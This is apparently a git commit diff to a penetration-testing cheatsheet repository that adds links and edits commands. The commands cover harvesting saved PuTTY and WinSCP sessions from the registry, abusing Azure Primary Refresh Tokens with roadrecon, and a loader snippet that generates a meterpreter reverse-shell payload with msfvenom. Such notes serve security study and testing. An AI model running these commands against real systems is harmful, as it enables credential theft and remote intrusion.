[AHK] Automatic update 👽

snovvcrash · Sep 27, 2024 · 301e262 · 301e262
1 parent f0db332
commit 301e262
Show file tree

Hide file tree

Showing 12 changed files with 43 additions and 12 deletions.
diff --git a/admin/linux/README.md b/admin/linux/README.md
@@ -79,6 +79,16 @@ $ dig +time=1 +tcp +tries=1 +short txt ch whoami.cloudflare @1.0.0.1 | tr -d '\"
 
 
 
+### Internel Speed
+
+```
+$ curl https://speedtest.selectel.ru/100MB -o/dev/null
+$ curl --connect-to ::speedtest.selectel.ru https://manifest.googlevideo.com/100MB -k -o/dev/null
+$ speedtest-cli
+```
+
+
+
 
 ## Virtual Terminal
 

diff --git a/pentest/infrastructure/ad/ad-cs-abuse/esc8.md b/pentest/infrastructure/ad/ad-cs-abuse/esc8.md
@@ -5,8 +5,9 @@ description: NTLM Relay to AD CS HTTP Endpoints
 # ESC8
 
 * [https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/](https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/)
-* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/)
 * [https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
+* [https://habr.com/ru/company/deiteriylab/blog/581758/](https://habr.com/ru/company/deiteriylab/blog/581758/)
+* [https://habr.com/ru/companies/jetinfosystems/articles/846066/](https://habr.com/ru/companies/jetinfosystems/articles/846066/)
 
 
 

diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md
@@ -177,6 +177,7 @@ Note that we don't have to target the exact .NET Framework version when compilin
 - [https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec](https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec)
 - [https://github.com/icyguider/Shhhloader](https://github.com/icyguider/Shhhloader)
 - [https://hub.docker.com/repository/docker/snovvcrash/ollvm13](https://hub.docker.com/repository/docker/snovvcrash/ollvm13)
+- [https://github.com/jonpalmisc/limoncello](https://github.com/jonpalmisc/limoncello)
 
 Install LLVM 13.x obfuscator based on [heroims/obfuscator](https://github.com/heroims/obfuscator) and [tpoechtrager/wclang](https://github.com/tpoechtrager/wclang):
 

diff --git a/...t/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md b/...t/infrastructure/ad/av-edr-evasion/dotnet-assembly/dotnet-in-memory-assembly.md
@@ -29,6 +29,7 @@
 - [https://github.com/med0x2e/ExecuteAssembly](https://github.com/med0x2e/ExecuteAssembly)
 - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
 - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
+- [https://github.com/VoldeSec/PatchlessCLRLoader](https://github.com/VoldeSec/PatchlessCLRLoader)
 
 
 

diff --git a/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md b/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md
@@ -219,6 +219,13 @@ PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exi
 
 
 
+### SspirConnectRpc
+
+- [https://itm4n.github.io/ghost-in-the-ppl-part-2/](https://itm4n.github.io/ghost-in-the-ppl-part-2/)
+- [https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp](https://github.com/itm4n/Pentest-Windows/blob/main/NdrServerCallAll/DuplicateHandle.cpp)
+
+
+
 ### MirrorDump
 
 - [https://github.com/CCob/MirrorDump](https://github.com/CCob/MirrorDump)

diff --git a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
@@ -12,7 +12,8 @@
 ```
 Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
 Cmd > reg query "HKEY_USERS\<SID>\Software\SimonTatham\PuTTY\Sessions" /s
-PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
+PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions" -Recurse
+PS > Get-ChildItem -Path "Registry::HKEY_USERS\<SID>\Software\SimonTatham\PuTTY\Sessions" -Recurse
 ```
 
 
@@ -26,11 +27,12 @@ PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
 
 - [https://winscp.net/eng/docs/faq_password](https://winscp.net/eng/docs/faq_password)
 - [https://github.com/anoopengineer/winscppasswd](https://github.com/anoopengineer/winscppasswd)
-- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life)
+- [https://snovvcrash.rocks/2021/08/07/htb-rpg.html](https://snovvcrash.rocks/2021/08/07/htb-rpg.html#5-wake-from-death-and-turn-to-life)
 
 ```
 Cmd > reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
 Cmd > reg query "HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions" /s
 Cmd > for /f "tokens=*" %a in ('reg query "HKEY_USERS" ^| findstr /r "S-1-5-.*"') do @reg query "%a\Software\Martin Prikryl\WinSCP 2\Sessions" /s
-PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions\" -Recurse
+PS > Get-ChildItem -Path "HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse
+PS > Get-ChildItem -Path "Registry::HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions" -Recurse
 ```
diff --git a/pentest/infrastructure/ad/sccm-abuse.md b/pentest/infrastructure/ad/sccm-abuse.md
@@ -10,6 +10,8 @@ description: System Center Configuration Manager / Microsoft Endpoint Configurat
 - [https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/](https://www.securesystems.de/blog/active-directory-spotlight-attacking-the-microsoft-configuration-manager/)
 - [https://http418infosec.com/offensive-sccm-summary](https://http418infosec.com/offensive-sccm-summary)
 
+{% embed url="https://github.com/subat0mik/Misconfiguration-Manager/blob/main/README.md#sccm-attack-matrix" caption="Misconfiguration Manager / SCCM Attack Matrix" %}
+
 
 
 

diff --git a/pentest/infrastructure/azure-ad/README.md b/pentest/infrastructure/azure-ad/README.md
@@ -49,11 +49,12 @@ $ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --ra
 - [https://github.com/dirkjanm/ROADtools](https://github.com/dirkjanm/ROADtools?tab=readme-ov-file#using-roadrecon)
 
 ```
-$ roadrecon auth --device-code
-$ roadrecon gather
-$ roadrecon gui
+$ roadrecon auth --device-code [-ua '<USER_AGENT>']
+$ roadrecon gather [-d megacorp.db] [-ua '<USER_AGENT>']
+$ roadrecon gui [-d megacorp.db]
 ```
 
+
 #### AzureHound
 
 - [https://github.com/BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound/releases/latest)

diff --git a/pentest/infrastructure/azure-ad/prt-abuse.md b/pentest/infrastructure/azure-ad/prt-abuse.md
@@ -7,6 +7,12 @@ description: Primary Refresh Tokens
 - [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
 - [https://aadinternals.com/post/prt/](https://aadinternals.com/post/prt/)
 
+```
+$ roadrecon auth --prt-init
+Cmd > ROADToken.exe <NONCE>
+$ [proxychains] roadrecon auth [-d megacorp.db] --prt-cookie <COOKIE> [-ua '<USER_AGENT>']
+```
+
 
 
 

diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md
@@ -698,6 +698,7 @@ done
 ### Old Ubuntu Quick Deploy (Cheatsheet)
 
 - [http://old-releases.ubuntu.com/releases/](http://old-releases.ubuntu.com/releases/)
+- [https://hummelchen.gitbook.io/linux_lpe](https://hummelchen.gitbook.io/linux_lpe)
 
 ```
 $ sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list

diff --git a/redteam/maldev/README.md b/redteam/maldev/README.md
@@ -5,6 +5,8 @@
 - [https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/](https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/)
 - [https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/](https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/)
 
+{% embed url="https://gist.github.com/0prrr/c0954a638c55ab4b39e8b02ef312e806" caption="Malware Dev Reading List, 0prrr/All-Mal-Dev.md" %}
+
 [EIKAR](https://ru.wikipedia.org/wiki/EICAR-Test-File) test file:
 
 ```
@@ -16,16 +18,16 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}
 
 ## Blog Series / Books
 
-- [https://cocomelonc.github.io/](https://cocomelonc.github.io/)
-
 
 
 ### PE Structure
 
+- [https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/](https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/#the-common-ground)
 - [https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/](https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/)
 - [https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html](https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html)
 - [https://print3m.github.io/blog/x64-winapi-shellcoding](https://print3m.github.io/blog/x64-winapi-shellcoding)
 - [https://habr.com/ru/articles/808787/](https://habr.com/ru/articles/808787/)
+- [https://nikhilh-20.github.io/blog/peb_phobos_ransomware/](https://nikhilh-20.github.io/blog/peb_phobos_ransomware/)
 
 ![PE File Structure (by @Print3M)](https://print3m.github.io/imgs/x64-shellcoding-winapi/pe-structure.png)
 

diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md
@@ -21,12 +21,9 @@
 {% tab title="Windows" %}
 {% code title="loader.c" %}
 ```c
-#include <stdio.h>
 #include <windows.h>
-
 // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw -o met.bin --encrypt xor --encrypt-key a
 // xxd -i met.bin > shellcode.h
-#include <windows.h>
 #include "shellcode.h"
 
 int main() {